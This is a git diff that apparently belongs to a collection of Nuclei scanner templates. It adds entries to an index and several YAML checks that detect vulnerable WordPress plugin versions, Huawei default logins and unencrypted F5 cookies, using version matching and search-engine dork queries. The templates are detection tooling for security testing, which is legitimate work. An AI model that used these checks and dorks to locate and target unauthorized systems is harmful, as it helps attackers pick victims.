diff --git a/date.txt b/date.txt index 94bd479181..83b31cda11 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240909 +20240910 diff --git a/poc.txt b/poc.txt index 798b7d5385..23d0ead20c 100644 --- a/poc.txt +++ b/poc.txt @@ -6006,6 +6006,7 @@ ./poc/aws/amazonify.yaml ./poc/aws/amazonjs-c241b0ba6a777f828cfa26db407af41e.yaml ./poc/aws/amazonjs.yaml +./poc/aws/amazonsimpleadmin-6edf77024f4d8b245b28ab2d095dfd39.yaml ./poc/aws/amazonsimpleadmin-d2d940074fe5416377c3e4ffb35b3f1c.yaml ./poc/aws/amazonsimpleadmin.yaml ./poc/aws/ameliabooking-b8eb9b9fe9a052fc9eec2c7665eb339b.yaml @@ -26378,6 +26379,7 @@ ./poc/cve/CVE-2023-29173.yaml ./poc/cve/CVE-2023-29174-61b19180a709a75a8f2f6bd443cf11c8.yaml ./poc/cve/CVE-2023-29174.yaml +./poc/cve/CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105.yaml ./poc/cve/CVE-2023-29197-7dc7820b451dace4c37e93f29ab994ee.yaml ./poc/cve/CVE-2023-29197-a89dc10c82ed3d904f8fccc2ff4db320.yaml ./poc/cve/CVE-2023-29197.yaml @@ -37558,6 +37560,7 @@ ./poc/cve/CVE-2024-33652.yaml ./poc/cve/CVE-2024-33677-71525e5cb85c8646c9830951ba75e550.yaml ./poc/cve/CVE-2024-33677.yaml +./poc/cve/CVE-2024-33678-36a986088fbfded3f902f0126e5df7b5.yaml ./poc/cve/CVE-2024-33678-eaa7987a0e4044fbd5c104ca79591002.yaml ./poc/cve/CVE-2024-33678.yaml ./poc/cve/CVE-2024-33679-c2d079d10a67dd551de05116c6aaebcc.yaml @@ -37957,6 +37960,7 @@ ./poc/cve/CVE-2024-34769.yaml ./poc/cve/CVE-2024-3477-8c47af07f2484600ac78a772de46f68b.yaml ./poc/cve/CVE-2024-3477.yaml +./poc/cve/CVE-2024-34770-24ff7976a24ecae8467028a04882e6a8.yaml ./poc/cve/CVE-2024-34770-ad98ab01447e870f30191b4a919aae5b.yaml ./poc/cve/CVE-2024-34770.yaml ./poc/cve/CVE-2024-3478-f1b1672a851a069e48120221fa992476.yaml @@ -38466,6 +38470,7 @@ ./poc/cve/CVE-2024-3593-300e668244981d2f75260f71f7454d0f.yaml ./poc/cve/CVE-2024-3593.yaml ./poc/cve/CVE-2024-3594-36d7fb83c790460bdb8c61a1e30649d8.yaml +./poc/cve/CVE-2024-3594-c595d74d6be314ede9d7c2ad86657f6d.yaml ./poc/cve/CVE-2024-3594.yaml ./poc/cve/CVE-2024-3595-ae707ffdb0b84fee78545094f31fab5f.yaml ./poc/cve/CVE-2024-3595-af3cf7279598a37cf244aabc61c9a195.yaml @@ -39255,6 +39260,7 @@ ./poc/cve/CVE-2024-37961-c0a5626619ae68f7938a6724943ffe58.yaml ./poc/cve/CVE-2024-37961.yaml ./poc/cve/CVE-2024-37962-5340ecfad7167231bd651c5b5b0499b1.yaml +./poc/cve/CVE-2024-37962-d175fbe85434a0614bc0ae08147f4de6.yaml ./poc/cve/CVE-2024-37962.yaml ./poc/cve/CVE-2024-3806-2a7b3e2b9fc8d52b51ef6216a756d24e.yaml ./poc/cve/CVE-2024-3806.yaml @@ -40415,6 +40421,7 @@ ./poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml ./poc/cve/CVE-2024-43335.yaml ./poc/cve/CVE-2024-43336-28f522c815326c862a095ad99702db7f.yaml +./poc/cve/CVE-2024-43336-9ded2f75d9ce3d5a447116c77b245d3a.yaml ./poc/cve/CVE-2024-43336.yaml ./poc/cve/CVE-2024-43337-d59a162bda0a92fcb5cbdc9c17791b8c.yaml ./poc/cve/CVE-2024-43337.yaml @@ -41950,6 +41957,7 @@ ./poc/cve/CVE-2024-6271.yaml ./poc/cve/CVE-2024-6272-603d5732dac8de6d8f0b5ed827bd29fe.yaml ./poc/cve/CVE-2024-6272.yaml +./poc/cve/CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f.yaml ./poc/cve/CVE-2024-6283-b109f55830b5166e15fc8153b2a56ea0.yaml ./poc/cve/CVE-2024-6283.yaml ./poc/cve/CVE-2024-6288-3b7a2d7a942fc59043d359b6700da5b3.yaml @@ -42489,6 +42497,7 @@ ./poc/cve/CVE-2024-7486.yaml ./poc/cve/CVE-2024-7492-2a27ab15f61a26513636485e06679756.yaml ./poc/cve/CVE-2024-7492.yaml +./poc/cve/CVE-2024-7493-827cf828502e280939934bc36fcd15c8.yaml ./poc/cve/CVE-2024-7493-bb0a14087d0fade0f7feffc68abdc7a6.yaml ./poc/cve/CVE-2024-7493.yaml ./poc/cve/CVE-2024-7501-247bb3617bfa1396392f3b42a0d66a58.yaml @@ -42525,6 +42534,7 @@ ./poc/cve/CVE-2024-7607.yaml ./poc/cve/CVE-2024-7611-fa595bf0bd7d1cd7d067d139d8655508.yaml ./poc/cve/CVE-2024-7611.yaml +./poc/cve/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml ./poc/cve/CVE-2024-7620-bcec0146e1a4df3dcb256abef7433801.yaml ./poc/cve/CVE-2024-7620.yaml ./poc/cve/CVE-2024-7621-410ca600b3388f15ef833a17e3d39b81.yaml @@ -42550,6 +42560,7 @@ ./poc/cve/CVE-2024-7651-54b05056620424ffb4dfd689f232601b.yaml ./poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml ./poc/cve/CVE-2024-7651.yaml +./poc/cve/CVE-2024-7655-cb8797e18cf270e181c88790358f477b.yaml ./poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml ./poc/cve/CVE-2024-7656.yaml ./poc/cve/CVE-2024-7687-ec8f591b67a17cc36542cbb68d2a1c0e.yaml @@ -42570,6 +42581,7 @@ ./poc/cve/CVE-2024-7703.yaml ./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml ./poc/cve/CVE-2024-7717.yaml +./poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml ./poc/cve/CVE-2024-7775-cb89a9bf3c0d813debb09dc21c3f085f.yaml ./poc/cve/CVE-2024-7775.yaml ./poc/cve/CVE-2024-7777-e2bdcc8b58b83d53647a50d88143707d.yaml @@ -42673,10 +42685,12 @@ ./poc/cve/CVE-2024-8199.yaml ./poc/cve/CVE-2024-8200-212df01da660270f0a3ccabafd9f05f2.yaml ./poc/cve/CVE-2024-8200.yaml +./poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml ./poc/cve/CVE-2024-8247-7ddc0c06e971c1cf25a0f3f37508e6b0.yaml ./poc/cve/CVE-2024-8247.yaml ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml ./poc/cve/CVE-2024-8252.yaml +./poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml ./poc/cve/CVE-2024-8274.yaml ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml @@ -42696,14 +42710,17 @@ ./poc/cve/CVE-2024-8325.yaml ./poc/cve/CVE-2024-8363-7b614cefc269f651d0fa9d8a81fb52fb.yaml ./poc/cve/CVE-2024-8363.yaml +./poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml ./poc/cve/CVE-2024-8427-fbcab5496b8138780394aea71f3f3840.yaml ./poc/cve/CVE-2024-8427.yaml ./poc/cve/CVE-2024-8428-3b140a48fddab0e2501d7d69c672d7cf.yaml ./poc/cve/CVE-2024-8428.yaml +./poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml ./poc/cve/CVE-2024-8480-f1d8d42bfc1633b849f4ef6346a133c9.yaml ./poc/cve/CVE-2024-8480.yaml ./poc/cve/CVE-2024-8538-001bcf7ee52037e79f6a696add474366.yaml ./poc/cve/CVE-2024-8538.yaml +./poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -72715,6 +72732,7 @@ ./poc/other/eventprime-event-calendar-management-09b45fe19dc9ef9fdacc3f3c93fdeb43.yaml ./poc/other/eventprime-event-calendar-management-337fb39e946da153801a049df0010f31.yaml ./poc/other/eventprime-event-calendar-management-53b5da835a02c27f602111203957ec44.yaml +./poc/other/eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9.yaml ./poc/other/eventprime-event-calendar-management-6d9f0383e02ac4e75e81aa915059c89c.yaml ./poc/other/eventprime-event-calendar-management-70abe0d924c478ac3475ca57424b78cc.yaml ./poc/other/eventprime-event-calendar-management-98dee7484a8ec61da325326fb7f20f00.yaml @@ -74408,6 +74426,7 @@ ./poc/other/frontend-checklist-8caa47b5e9e485adece08d242ad04ac8.yaml ./poc/other/frontend-checklist-f057cd0fecbe00e411754884f6dfe796.yaml ./poc/other/frontend-checklist.yaml +./poc/other/frontend-dashboard-2071daaa8fb94694af774d99340ea9d4.yaml ./poc/other/frontend-dashboard-b8834e5a3e036dd5e61d34a3b1068be9.yaml ./poc/other/frontend-dashboard.yaml ./poc/other/frontend-group-restriction-for-learndash-ff9293ba28748efa2ab9a2fe77385468.yaml @@ -79637,6 +79656,7 @@ ./poc/other/master-addons-49d43f190785c213b594369e56643fab.yaml ./poc/other/master-addons-4c613eb3f9ae83b4f2727f836be94578.yaml ./poc/other/master-addons-500ddd1cca6c96c69b650e8e1ea970a5.yaml +./poc/other/master-addons-66e3d4c0031beabde0083df515780997.yaml ./poc/other/master-addons-6dcdd4533f288f97c824b10ce7bbf082.yaml ./poc/other/master-addons-768e76e5751dd7dcd77cdc7476921144.yaml ./poc/other/master-addons-80da3f3078021e19df6d4a183eff6fe9.yaml @@ -81707,6 +81727,7 @@ ./poc/other/notifyvisitors-lead-form-3d4e190fa6ca2f85ee1692fd779d0a41.yaml ./poc/other/notifyvisitors-lead-form.yaml ./poc/other/notion-phish.yaml +./poc/other/nova-blocks-0e7c62abb845144ff6b6f8011c23237b.yaml ./poc/other/nova-lite-edebb837b13ffab3391e4efe2a95bf38.yaml ./poc/other/nova-lite.yaml ./poc/other/novelist-2fcbba4f8d24450ee551bf33de17fc72.yaml @@ -82797,11 +82818,13 @@ ./poc/other/pear.yaml ./poc/other/peepso-core-338fc97c24276ab87a510e79a909afca.yaml ./poc/other/peepso-core-3b2ef2d73cbfd65b1121e5f18e3b865d.yaml +./poc/other/peepso-core-4cd19fbbacd82d8d91e116054bffc182.yaml ./poc/other/peepso-core-64a4f42c48ab8916a593b8cc4bce89ff.yaml ./poc/other/peepso-core-8d22cf43a481ff4afe0b785ad4d465cd.yaml ./poc/other/peepso-core-967f9c4943c798ef55841614fa0c0a60.yaml ./poc/other/peepso-core-a40b1529b71b3a56ebe346e649ca082d.yaml ./poc/other/peepso-core-a6c5d9f5ae6235e3cb6733928ebe1440.yaml +./poc/other/peepso-core-b2ac18e0119b47893588ba1a22162586.yaml ./poc/other/peepso-core-eefb756a660cd5c8041e631a00deeb83.yaml ./poc/other/peepso-core-f7840d6d28c8b20841ce043179efa799.yaml ./poc/other/peepso-core.yaml @@ -87918,6 +87941,7 @@ ./poc/other/slider-by-supsystic-cda4bcfc95d6584a29dc850e5d8998c8.yaml ./poc/other/slider-by-supsystic-e595a0c3ad3e0defdd41b40b77d69b2c.yaml ./poc/other/slider-by-supsystic.yaml +./poc/other/slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e.yaml ./poc/other/slider-factory-0712326ce3eb85c1c14309021d79da22.yaml ./poc/other/slider-factory-42e7c67c33e54fce9877ed077a2d8484.yaml ./poc/other/slider-factory-6352f4cd29f3e453ab1742964f7f7fd8.yaml @@ -90728,6 +90752,7 @@ ./poc/other/tutor-3057751d1052c52502e1097b3cf1325d.yaml ./poc/other/tutor-347023f6e6e65ca497fc94dddd1d0a05.yaml ./poc/other/tutor-3a0643f16f3e861f0bb145ef053d314e.yaml +./poc/other/tutor-3b06cf3f3c9659ae3abd37923d73984e.yaml ./poc/other/tutor-460504934ff174d5667f70afce2ce24e.yaml ./poc/other/tutor-46fb7d83480d94b010199c53923212f5.yaml ./poc/other/tutor-4b5310b2ba9a839700768e9d26ada001.yaml @@ -103021,6 +103046,7 @@ ./poc/sql/CVE-2024-7380-6a19e79de20767dbc62e297886ac1342.yaml ./poc/sql/CVE-2024-7390-c6e14cdb3bb6b824b90602f2e8d31a7e.yaml ./poc/sql/CVE-2024-7485-5e01bfd496bdbeeb312898de18c1a6e1.yaml +./poc/sql/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml ./poc/sql/CVE-2024-7702-dea8b852582db90080db47397ce3b7b1.yaml ./poc/sql/CVE-2024-7817-49083f3d0aeb0ae2badbca3840ad0f3c.yaml ./poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml @@ -103031,6 +103057,7 @@ ./poc/sql/CVE-2024-8197-c5c070dc8273cbfedbc9600c73cd97ad.yaml ./poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/sql/CVE-2024-8325-11327d2b9e1fdbe3b095a728909b8615.yaml +./poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml ./poc/sql/Changdao-165-SQLi.yaml ./poc/sql/Cmseasy-Http-Head-sqli.yaml ./poc/sql/Cmseasy-celive-sqli.yaml @@ -104801,6 +104828,7 @@ ./poc/sql/felici-8b7315bf3bc5aee1fd2be3bdb32c5f24.yaml ./poc/sql/felici-e83986bdda01c6cbf916db6f349af367.yaml ./poc/sql/file-manager-38267cacb7d16b0f0dbad9cdccc3b164.yaml +./poc/sql/file-manager-5afc1d5d5506db51958aa1cb25998e9c.yaml ./poc/sql/fileorganizer-d129dcd91671ee29c3cf5545f48db813.yaml ./poc/sql/filmix-09180f4ff94074ad413e55c77fdb25a4.yaml ./poc/sql/filr-protection-6477bf18cad6c823db485408d49b337b.yaml diff --git a/poc/auth/huawei-HG532e-default-login.yaml b/poc/auth/huawei-HG532e-default-login.yaml index 2ebc7ab348..5b907dd987 100644 --- a/poc/auth/huawei-HG532e-default-login.yaml +++ b/poc/auth/huawei-HG532e-default-login.yaml @@ -1,17 +1,11 @@ id: huawei-HG532e-default-login info: name: Huawei HG532e Default Credential - description: Huawei HG532e default admin credentials were discovered. author: pussycat0x severity: high metadata: shodan-query: http.html:"HG532e" tags: default-login,huawei - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 requests: - raw: - | @@ -34,5 +28,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml b/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml index 1c6bd1751b..d80088fb86 100644 --- a/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml +++ b/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml @@ -1,20 +1,23 @@ -id: unencrypted-bigip-ltm-cookie -info: - name: F5 BIGIP Unencrypted Cookie - author: PR3R00T - severity: info - reference: - - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values - - https://support.f5.com/csp/article/K23254150 - tags: misc -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - matchers: - - type: regex - regex: - - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([0-9a-zA-Z\.]*;)' - - '=[0-9]*\.[0-9]{3,5}\.[0-9]{4};' - part: header +id: unencrypted-bigip-ltm-cookie + +info: + name: F5 BIGIP Unencrypted Cookie + author: PR3R00T + severity: info + reference: + - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values + - https://support.f5.com/csp/article/K23254150 + tags: misc + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + matchers: + - type: regex + regex: + - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([0-9a-zA-Z\.]*;)' + - '=[0-9]*\.[0-9]{3,5}\.[0-9]{4};' + part: header \ No newline at end of file diff --git a/poc/aws/amazonsimpleadmin-6edf77024f4d8b245b28ab2d095dfd39.yaml b/poc/aws/amazonsimpleadmin-6edf77024f4d8b245b28ab2d095dfd39.yaml new file mode 100644 index 0000000000..f1cc4c0a97 --- /dev/null +++ b/poc/aws/amazonsimpleadmin-6edf77024f4d8b245b28ab2d095dfd39.yaml @@ -0,0 +1,59 @@ +id: amazonsimpleadmin-6edf77024f4d8b245b28ab2d095dfd39 + +info: + name: > + Affiliate Super Assistent <= 1.5.3 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f50769c-77b8-42ff-b67d-b9b289fc51da?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/amazonsimpleadmin/" + google-query: inurl:"/wp-content/plugins/amazonsimpleadmin/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,amazonsimpleadmin,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/amazonsimpleadmin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "amazonsimpleadmin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.3') \ No newline at end of file diff --git a/poc/cve/CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105.yaml b/poc/cve/CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105.yaml new file mode 100644 index 0000000000..550099c607 --- /dev/null +++ b/poc/cve/CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105 + +info: + name: > + Tutor LMS <= 2.7.4 - Cross-Site Request Forgery via 'addon_enable_disable' + author: topscoder + severity: medium + description: > + The Tutor LMS plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.4. This is due to missing or incorrect nonce validation on the 'addon_enable_disable' function. This makes it possible for unauthenticated attackers to enable or disable addons via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/992abd72-2a8e-4bda-94c2-4a7f88487906?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2023-2919 + metadata: + fofa-query: "wp-content/plugins/tutor/" + google-query: inurl:"/wp-content/plugins/tutor/" + shodan-query: 'vuln:CVE-2023-2919' + tags: cve,wordpress,wp-plugin,tutor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tutor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-33678-36a986088fbfded3f902f0126e5df7b5.yaml b/poc/cve/CVE-2024-33678-36a986088fbfded3f902f0126e5df7b5.yaml new file mode 100644 index 0000000000..01a10b25d9 --- /dev/null +++ b/poc/cve/CVE-2024-33678-36a986088fbfded3f902f0126e5df7b5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-33678-36a986088fbfded3f902f0126e5df7b5 + +info: + name: > + ClickCease Click Fraud Protection <= 3.2.7 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The ClickCease Click Fraud Protection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.7. This is due to missing or incorrect nonce validation on the save_settings() function. This makes it possible for unauthenticated attackers to update settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e03f95ae-c1ba-4679-888b-055293e1351f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-33678 + metadata: + fofa-query: "wp-content/plugins/clickcease-click-fraud-protection/" + google-query: inurl:"/wp-content/plugins/clickcease-click-fraud-protection/" + shodan-query: 'vuln:CVE-2024-33678' + tags: cve,wordpress,wp-plugin,clickcease-click-fraud-protection,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clickcease-click-fraud-protection/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clickcease-click-fraud-protection" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-34770-24ff7976a24ecae8467028a04882e6a8.yaml b/poc/cve/CVE-2024-34770-24ff7976a24ecae8467028a04882e6a8.yaml new file mode 100644 index 0000000000..891296a2f7 --- /dev/null +++ b/poc/cve/CVE-2024-34770-24ff7976a24ecae8467028a04882e6a8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-34770-24ff7976a24ecae8467028a04882e6a8 + +info: + name: > + Popup Maker – Responsive popup, Exit Intent Pop up, Email Optins, Autoresponder & More <= 1.3.6 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Popup Maker – Responsive popup, Exit Intent Pop up, Email Optins, Autoresponder & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4f0d78-caa0-4575-a090-e1c12d4ed8fd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-34770 + metadata: + fofa-query: "wp-content/plugins/popup-maker-wp/" + google-query: inurl:"/wp-content/plugins/popup-maker-wp/" + shodan-query: 'vuln:CVE-2024-34770' + tags: cve,wordpress,wp-plugin,popup-maker-wp,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/popup-maker-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "popup-maker-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3594-c595d74d6be314ede9d7c2ad86657f6d.yaml b/poc/cve/CVE-2024-3594-c595d74d6be314ede9d7c2ad86657f6d.yaml new file mode 100644 index 0000000000..1957f62171 --- /dev/null +++ b/poc/cve/CVE-2024-3594-c595d74d6be314ede9d7c2ad86657f6d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3594-c595d74d6be314ede9d7c2ad86657f6d + +info: + name: > + IDonate – blood request management system <= 1.9.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The IDonate – blood request management system plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ff558bb-7c5a-4e17-a3f5-bc9aa2332af1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-3594 + metadata: + fofa-query: "wp-content/plugins/idonate/" + google-query: inurl:"/wp-content/plugins/idonate/" + shodan-query: 'vuln:CVE-2024-3594' + tags: cve,wordpress,wp-plugin,idonate,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/idonate/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "idonate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-37962-d175fbe85434a0614bc0ae08147f4de6.yaml b/poc/cve/CVE-2024-37962-d175fbe85434a0614bc0ae08147f4de6.yaml new file mode 100644 index 0000000000..c07ba07f4e --- /dev/null +++ b/poc/cve/CVE-2024-37962-d175fbe85434a0614bc0ae08147f4de6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-37962-d175fbe85434a0614bc0ae08147f4de6 + +info: + name: > + Fusion <= 1.6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Fusion plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94ae2c4e-7281-4993-967b-6321e6279c47?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-37962 + metadata: + fofa-query: "wp-content/plugins/fusion/" + google-query: inurl:"/wp-content/plugins/fusion/" + shodan-query: 'vuln:CVE-2024-37962' + tags: cve,wordpress,wp-plugin,fusion,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fusion/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fusion" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43336-9ded2f75d9ce3d5a447116c77b245d3a.yaml b/poc/cve/CVE-2024-43336-9ded2f75d9ce3d5a447116c77b245d3a.yaml new file mode 100644 index 0000000000..28edd42cc2 --- /dev/null +++ b/poc/cve/CVE-2024-43336-9ded2f75d9ce3d5a447116c77b245d3a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43336-9ded2f75d9ce3d5a447116c77b245d3a + +info: + name: > + WP User Manager <= 2.9.10 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The WP User Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.9.10. This is due to missing or incorrect nonce validation on the fix_data_installation() function. This makes it possible for unauthenticated attackers to fix data installation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/217b1213-de46-4c1d-baea-41a859bfcc60?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43336 + metadata: + fofa-query: "wp-content/plugins/wp-user-manager/" + google-query: inurl:"/wp-content/plugins/wp-user-manager/" + shodan-query: 'vuln:CVE-2024-43336' + tags: cve,wordpress,wp-plugin,wp-user-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-user-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-user-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f.yaml 